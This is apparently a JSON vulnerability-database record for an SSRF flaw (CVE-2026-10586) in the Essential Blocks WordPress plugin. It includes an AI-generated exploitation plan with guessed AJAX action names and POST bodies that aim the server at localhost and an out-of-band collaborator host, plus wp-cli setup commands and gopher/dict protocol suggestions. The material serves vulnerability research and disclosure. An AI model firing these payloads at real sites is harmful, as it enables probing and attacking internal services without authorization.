[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fKw76TlmrcMzyUQWglhfaWeMT9GM2328YohLtnMhCtEY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-10586","gutenberg-essential-blocks-page-builder-for-gutenberg-blocks-patterns-authenticated-author-server-side-request-forgery","Gutenberg Essential Blocks – Page Builder for Gutenberg Blocks & Patterns \u003C= 6.1.3 - Authenticated (Author+) Server-Side Request Forgery","The Gutenberg Essential Blocks – Page Builder for Gutenberg Blocks & Patterns plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.1.3 via the `save_ai_generated_image()` function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","essential-blocks",null,"\u003C=6.1.3","6.1.4","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Server-Side Request Forgery (SSRF)","2026-06-04 10:40:13","2026-06-04 23:28:52",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F08906577-162c-4875-b16c-18d4912c2611?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fadmin\u002Fdashboard\u002Fadmin.asset.php","assets\u002Fadmin\u002Fdashboard\u002Fadmin.js","assets\u002Fadmin\u002Feditor\u002Feditor.asset.php","assets\u002Fadmin\u002Feditor\u002Feditor.css","assets\u002Fadmin\u002Feditor\u002Feditor.js","assets\u002Fadmin\u002Feditor\u002Ffrontend.css","assets\u002Fblocks\u002Fadvanced-image\u002Fstyle.css","assets\u002Fblocks\u002Fgoogle-map\u002Ffrontend.asset.php","researched",false,3,"This research plan outlines the steps to verify and exploit **CVE-2026-10586**, an SSRF vulnerability in the **Essential Blocks** plugin.\n\n### 1. Vulnerability Summary\nThe vulnerability exists in the `save_ai_generated_image()` function of the Gutenberg Essential Blocks plugin (versions \u003C= 6.1.3). This function is designed to take a URL of an AI-generated image (likely from an external service like OpenAI), fetch it, and save it to the WordPress Media Library. However, the function fails to validate the source URL, allowing an authenticated user with Author-level permissions to provide internal or arbitrary URLs, leading to Server-Side Request Forgery (SSRF).\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** WordPress AJAX (`\u002Fwp-admin\u002Fadmin-ajax.php`) or REST API. Given the plugin's architecture, this is likely a registered AJAX action.\n*   **Action Name:** `eb_save_ai_generated_image` or `essential_blocks_save_ai_generated_image` (inferred from plugin naming conventions).\n*   **Vulnerable Parameter:** `url` or `image_url`.\n*   **Required Authentication:** Author level or higher (Users who can access the Gutenberg editor and use AI block features).\n*   **Capability:** `edit_posts`.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The user triggers an AI image generation or \"Save to Library\" action in the block editor.\n2.  **AJAX\u002FREST Call:** The frontend JS (likely in `assets\u002Fadmin\u002Feditor\u002Feditor.js`) sends a request to the server with a URL parameter.\n3.  **Function Call:** `save_ai_generated_image( $request )` is invoked.\n4.  **SSRF Sink:** The function calls `download_url( $url )` or `wp_remote_get( $url )` without restricting the URL to allowed domains (like `openai.com` or `dalle.com`).\n5.  **Processing:** The server fetches the content from the provided URL. If it's an internal service (e.g., `http:\u002F\u002Flocalhost:6379`), the server attempts to communicate with it.\n\n### 4. Nonce Acquisition Strategy\nThe Essential Blocks plugin localizes configuration data for the Gutenberg editor. We need to extract the nonce required for the AI-related actions.\n\n1.  **Identify Shortcode:** The Essential Blocks plugin doesn't necessarily need a shortcode for editor-side vulnerabilities, but we need to be in the post editor context.\n2.  **Setup:** Create an Author user and a new post.\n3.  **Navigation:** Log in and navigate to the editor for that post: `\u002Fwp-admin\u002Fpost-new.php`.\n4.  **Extraction:**\n    *   The plugin likely uses `EssentialBlocksLocalize` or a similar object.\n    *   Check for nonces in the global scope:\n        ```javascript\n        \u002F\u002F Potential keys to check in browser_eval\n        window.EssentialBlocksLocalize?.nonce\n        window.EssentialBlocksConfig?.nonce\n        window.eb_admin_data?.nonce\n        ```\n    *   If the nonce is specific to the AI extension, look for:\n        ```javascript\n        window.EssentialBlocksLocalize?.ai_nonce\n        ```\n\n### 5. Exploitation Strategy\n\n#### Step 1: Target Identification\nSearch the plugin directory to find the exact AJAX action and parameter name.\n```bash\ngrep -rn \"save_ai_generated_image\" .\ngrep -rn \"wp_ajax_.*save_ai\" .\n```\n\n#### Step 2: Test Internal Request (SSRF)\nOnce the action and nonce are found, attempt to hit an internal service. We will use a unique port to observe response differences.\n\n**HTTP Request (Example):**\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=eb_save_ai_generated_image&url=http:\u002F\u002F127.0.0.1:80&_wpnonce=[NONCE]\n    ```\n\n#### Step 3: Blind Verification (Time-based or Out-of-band)\nIf the response does not return the content of the URL, use a collaborator URL (e.g., from `interactsh` or a similar tool) to confirm the request is leaving the server.\n```\naction=eb_save_ai_generated_image&url=http:\u002F\u002F[your-collaborator-id].oast.fun&_wpnonce=[NONCE]\n```\n\n### 6. Test Data Setup\n1.  **User Creation:**\n    ```bash\n    wp user create attacker attacker@example.com --role=author --user_pass=password123\n    ```\n2.  **Post Creation:**\n    ```bash\n    wp post create --post_type=post --post_title=\"SSRF Test\" --post_status=publish --post_author=$(wp user get attacker --field=ID)\n    ```\n3.  **Plugin Configuration:** Ensure \"Essential Blocks\" is active. AI features might require a (fake) API key to be set in the plugin settings to enable the UI elements, though the backend function might be callable regardless.\n\n### 7. Expected Results\n*   **Successful Exploitation:** The server returns a success message or an error indicating it tried to parse the response from the provided internal URL (e.g., \"Invalid image type\" if hitting a non-image internal service).\n*   **OOB Confirmation:** A hit is recorded on the listener\u002Fcollaborator URL.\n*   **Internal Discovery:** Different response times or error messages when targeting open vs. closed internal ports (e.g., `localhost:80` vs `localhost:12345`).\n\n### 8. Verification Steps\n1.  Check the WordPress Media Library to see if any \"image\" was attempted to be created:\n    ```bash\n    wp media list\n    ```\n2.  Verify if the plugin logged any errors in `wp-content\u002Fdebug.log` related to the failed image download from the internal URL.\n\n### 9. Alternative Approaches\n*   **REST API:** Check if the function is exposed via a REST route: `register_rest_route( 'essential-blocks\u002Fv1', '\u002Fsave-ai-image' )`. If so, use the `X-WP-Nonce` header with the REST nonce.\n*   **Post Meta:** In some cases, the URL might be saved to post meta first and then processed. Attempt to update a post with an Essential Block and include the `url` in the block attributes.\n*   **Gopher\u002FDict protocols:** If the underlying fetcher is `curl`, attempt to use `gopher:\u002F\u002F` or `dict:\u002F\u002F` for more advanced internal service exploitation.","gemini-3-flash-preview","2026-06-04 14:13:10","2026-06-04 14:13:43",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","6.1.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-blocks\u002Ftags\u002F6.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-blocks.6.1.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-blocks\u002Ftags\u002F6.1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-blocks.6.1.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-blocks\u002Ftags"]